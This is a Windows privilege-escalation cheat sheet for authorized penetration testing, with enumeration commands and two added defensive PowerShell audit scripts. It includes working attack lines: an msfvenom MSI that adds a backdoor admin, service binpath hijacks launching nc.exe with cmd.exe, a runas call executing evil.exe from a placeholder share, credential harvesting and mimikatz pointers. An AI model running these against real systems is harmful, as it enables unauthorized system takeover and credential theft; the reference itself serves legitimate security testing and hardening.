Overview
Windows local privilege escalation (LPE) involves exploiting misconfigurations, weak permissions, vulnerable services, or stored credentials to elevate from a standard user to SYSTEM/Administrator. The best automated enumeration tool is WinPEAS.
This content is for authorized penetration testing only. Never test systems you do not have explicit written permission to assess.
OS Version and Patches
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic os get osarchitecture
PowerShell: [System.Environment]::OSVersion.Version
Get-WmiObject -Query 'select * from win32_quickfixengineering' | foreach { $_.HotFixID }
Get-HotFix -Description "Security update"
Environment Variables
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShell History and Transcripts
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
# Check transcript registry keys
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
Drives and Shares
wmic logicaldisk get caption || fsutil fsinfo drives
Get-PSDrive | where { $_.Provider -like "Microsoft.PowerShell.Core\FileSystem" }
WSUS Exploitation
If Windows Update uses HTTP instead of HTTPS:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
# or PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
If the value starts with http:// and UseWUServer=1, inject fake updates using Wsuxploit or pyWSUS.
AlwaysInstallElevated
If both registry keys are set to 0x1, any user can install MSIs as SYSTEM:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Exploit:
msfvenom -p windows/adduser USER=backdoor PASS=P@ssword123! -f msi -o alwe.msi
msiexec /quiet /qn /i C:\Users\Public\alwe.msi
Service Exploitation
net start
wmic service list brief
sc query
Get-Service
# Check service permissions with accesschk
accesschk.exe -ucqv <Service_Name>
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
# Modify a service binary path if you have SERVICE_CHANGE_CONFIG
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
Key permissions that allow binary path modification:
SERVICE_CHANGE_CONFIG
WRITE_DAC
WRITE_OWNER
GENERIC_WRITE / GENERIC_ALL
Windows resolves unquoted paths with spaces by trying each partial path: C:\Program Files\Some Folder\Service.exe
→ tries: C:\Program.exe
→ tries: C:\Program Files\Some.exe
→ tries: C:\Program Files\Some Folder\Service.exe
Find unquoted service paths (one line in cmd):
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v '"'
# PowerShell (PowerUp)
Get-ServiceUnquoted -Verbose
Service Registry Permissions
reg query HKLM\System\CurrentControlSet\Services /s /v imagepath
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
If writable, change the binary path:
reg add HKLM\SYSTEM\CurrentControlSet\services\<svc> /v ImagePath /t REG_EXPAND_SZ /d C:\path\to\payload.exe /f
User and Group Enumeration
# CMD
net users %username%
net users
net localgroup
net localgroup Administrators
whoami /all
# PowerShell
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Running Processes Analysis
Tasklist /SVC
tasklist /v /fi "username eq system"
# List non-svchost processes with their owners
Get-WmiObject -Query "Select * from Win32_Process" |
    where { $_.Name -notlike "svchost*" } |
    Select Name, Handle, @{Label="Owner"; Expression={$_.GetOwner().User}}
Check binary permissions of running processes (batch-file syntax; use %x / %z instead of %%x / %%z when typing this interactively):
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
    for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
        icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%"
    )
)
Windows Credentials
Winlogon Auto-Login Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword"
cmdkey /list
# Use saved credentials
runas /savecred /user:WORKGROUP\Administrator "\\10.x.x.x\SHARE\evil.exe"
# DPAPI master keys
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
# Decrypt with mimikatz
# dpapi::masterkey /pvk or /rpc
# Saved Wi-Fi profiles
netsh wlan show profile
netsh wlan show profile <SSID> key=clear
Unattended Installation Files
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml 2>nul
# Sticky Notes database (may hold saved notes with credentials)
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
# Interfaces
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
# Open ports
netstat -ano
# Shares
net view
net view /all /domain [domainname]
net share
# Routing
route print
# ARP
arp -A
KrbRelayUp (Domain LPE)
Requires: LDAP signing not enforced + users can configure RBCD + users can create computers (all default settings).
# https://github.com/Dec0ne/KrbRelayUp
KrbRelayUp.exe relay -d <domain> -cn <computername>
Antivirus / Security Controls Enumeration
# Audit settings
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
# LAPS — local admin password management
reg query "HKLM\Software\Policies\Microsoft\Services\AdmPwd" /v AdmPwdEnabled
# WDigest — if enabled, cleartext passwords in LSASS
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
# LSA Protection
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
# Credential Guard
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
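The following PowerShell is an added example, not part of the original notes, that reads the registry settings from the WSUS, AlwaysInstallElevated and security-controls sections above and reports which ones are in an insecure state together with the fix. It assumes PowerShell 5.1+, that UseWUServer lives under the WindowsUpdate\AU subkey, and the function names Get-RegValue and Get-LpeHardeningFindings are chosen here.

```powershell
# Added example (not the notes' own code). Read-only; runs from a standard user session.
function Get-RegValue {
    # Returns the value, or $null when the key or value does not exist.
    param([string]$Key, [string]$Name)
    try { (Get-ItemProperty -Path $Key -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Get-LpeHardeningFindings {
    $f = New-Object System.Collections.Generic.List[object]
    $add = { param($Check, $Insecure, $Value, $Fix)
        $f.Add([pscustomobject]@{ Check = $Check; Insecure = $Insecure; Value = $Value; Fix = $Fix }) }

    # WSUS over plain HTTP lets an on-path attacker serve malicious updates.
    $wu = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    $server = Get-RegValue $wu 'WUServer'
    $useWu  = Get-RegValue "$wu\AU" 'UseWUServer'   # assumption: AU subkey
    & $add 'WSUS over HTTP' ($useWu -eq 1 -and "$server" -like 'http://*') $server 'Serve WSUS over HTTPS'

    # AlwaysInstallElevated only applies when both HKLM and HKCU values are 1.
    $sub = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $aie = (Get-RegValue "HKLM:\$sub" 'AlwaysInstallElevated') -eq 1 -and
           (Get-RegValue "HKCU:\$sub" 'AlwaysInstallElevated') -eq 1
    & $add 'AlwaysInstallElevated' $aie $aie 'Set both values to 0 or remove them'

    # WDigest UseLogonCredential=1 keeps cleartext passwords in LSASS memory.
    $wd = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    & $add 'WDigest cleartext creds' ($wd -eq 1) $wd 'Set UseLogonCredential to 0'

    # LSA Protection (RunAsPPL 1 or 2) and Credential Guard (LsaCfgFlags 1 or 2).
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $ppl = Get-RegValue $lsa 'RunAsPPL'
    & $add 'LSA Protection off' ($ppl -ne 1 -and $ppl -ne 2) $ppl 'Set RunAsPPL to 1'
    $cg = Get-RegValue $lsa 'LsaCfgFlags'
    & $add 'Credential Guard off' ($cg -ne 1 -and $cg -ne 2) $cg 'Enable Credential Guard (LsaCfgFlags 1 or 2)'
    return $f
}

Get-LpeHardeningFindings | Format-Table -AutoSize
```

A missing value reports as an empty Value column, which for RunAsPPL and LsaCfgFlags is itself the insecure state.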
PATH DLL Hijacking
If you have write permissions inside a PATH folder:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" )
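As an added example (not PowerUp's code and not part of the original notes) serving both the unquoted service path section and the PATH folder check above, the following PowerShell reproduces the partial-path candidates Windows tries for an unquoted path with spaces and reports every candidate directory, and every PATH entry, that Everyone, Authenticated Users, BUILTIN\Users or the current user can write to. It assumes PowerShell 5.1+ on Windows; the function names Test-LowPrivWritable, Get-UnquotedServicePathRisk and Get-WritablePathDir are chosen here.

```powershell
# Added example (not PowerUp's or the notes' own code). Assumes PowerShell 5.1+.
# Principals whose write access lets any local user plant a binary.
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')   # Everyone, Authenticated Users, BUILTIN\Users
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write,Modify,FullControl'

function Test-LowPrivWritable {
    # True if $Path exists and an Allow ACE grants write rights to a low-priv
    # SID, to the current user, or to one of the current user's groups.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
        catch { continue }   # orphaned or untranslatable identity
        if ($LowPrivSids -contains $sid.Value -or $me.User -eq $sid -or $me.Groups -contains $sid) { return $true }
    }
    return $false
}

function Get-UnquotedServicePathRisk {
    # Reproduces the lookup order for an unquoted ImagePath with spaces
    # (C:\Program.exe, then C:\Program Files\Some.exe, ...) and reports the
    # candidates whose directory a low-privileged user could write to.
    Get-CimInstance Win32_Service | ForEach-Object {
        $p = $_.PathName
        if (-not $p -or $p.StartsWith('"')) { return }          # quoted: not vulnerable
        if ($p -match '^(.*?\.exe)(\s|$)') { $p = $Matches[1] } # strip arguments
        if ($p -notmatch ' ') { return }                        # no spaces: nothing to split
        $parts = $p -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            if (Test-LowPrivWritable $dir) {
                [pscustomobject]@{ Service = $_.Name; Candidate = $candidate; WritableDir = $dir }
            }
        }
    }
}

function Get-WritablePathDir {
    # PATH entries a low-privileged user can write to (DLL/EXE search order).
    $env:Path -split ';' | Where-Object { $_ } | Sort-Object -Unique |
        Where-Object { Test-LowPrivWritable $_ } |
        ForEach-Object { [pscustomobject]@{ PathEntry = $_ } }
}
Get-UnquotedServicePathRisk | Format-Table -AutoSize
Get-WritablePathDir | Format-Table -AutoSize
```

Any row returned is a finding to fix by quoting the ImagePath or tightening the directory ACL; an empty result for both functions is the expected state on a hardened host.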